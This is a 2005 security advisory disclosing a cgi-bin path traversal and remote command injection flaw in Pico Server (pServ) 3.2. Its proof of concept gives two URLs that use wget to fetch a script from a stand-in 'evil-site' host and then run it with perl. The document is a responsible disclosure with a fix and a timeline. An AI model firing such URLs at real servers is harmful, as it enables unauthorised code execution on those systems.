pservBad.txt

` Advisory: Pico Server (pServ) Remote Command Injection  
  
RedTeam found a remote command injection in Pico Server (pServ) which results  
in a remote attacker being able to issue arbitrary commands on the server.  
  
Details  
=======  
  
Product: Pico Server (pServ)  
Affected Version: 3.2(verified), <=3.2 probably too  
Immune Version: 3.3  
OS affected: all  
Security-Risk: very high  
Remote-Exploit: yes  
Vendor-URL: http://pserv.sourceforge.net/  
Vendor-Status: new version available  
Advisory-URL: http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010  
Advisory-Status: published  
CVE: CAN-2005-1365  
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365 #)  
  
  
Introduction  
============  
>From http://pserv.sourceforge.net/  
Pico Server is a small web server. It is meant to be portable and  
configurable.  
  
* small, portable  
* fast  
* CGI-BIN support  
* auto-indexing of directories  
* access and error logging (see p-reporter for an analyzer)  
* forking or single-connection at choice  
  
Pico Server (pServ) is written in portable C (K&R style so it can compile on  
older compilers too) and sports several options that by means of #define  
statements can customize the behavior, the performance and the feature set so  
to be able to fit better the the requisites.  
  
If pServ is compiled with support for CGI-BIN a remote attacker is able to  
execute any program (with pServ permissions) on the server by traversing out  
of the cgi-bin directory.  
  
More Details  
============  
  
pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as  
cgi-scripts.  
To avoid that a user traverses out of the cgi-bin using traditional /../,  
pServ parses the requested url. It increases a counter by one if it parses a  
/ (new subdir) and decreases the counter if ist parses /../. If the counter  
goes below zero the url is rejected as illegal. Unfortunately an attacker can  
avoid beeing rejected, just using enough / in the url (without directory  
names between them), so he can traverse out of the cgi-bin by adding some  
/../ . This lets the attacker execute any program on the server (with pServ  
permissions).  
  
Proof of Concept  
================  
  
The following url downloads a script (or executable) to the server:  
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl  
  
This is how the script can be executed afterwards:  
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl  
  
  
Workaround  
==========  
  
The only workaround is to compile pServ without support for cgi-bin.  
  
Fix  
===  
  
The Developers have released Version 3.3. This version should fix the  
problem. The changes have not been tested by RedTeam, yet.  
  
Security Risk  
=============  
  
The security risk is rated very high because a remote attacker can use this  
flaw to execute arbitrary code on the server (with the permissions of pServ).  
  
History  
=======  
  
2005-04-29 found  
2005-05-02 first attempt to inform developers  
2005-05-02 CAN-number assigned  
2005-05-04 second attempt to inform developers  
2005-05-16 new version released. Advisory published  
  
RedTeam  
=======  
  
RedTeam is a penetration testing group working at the Laboratory for  
Dependable Distributed Systems at RWTH-Aachen University. You can find more  
Information on the RedTeam Project at  
http://tsyklon.informatik.rwth-aachen.de/redteam/  
  
`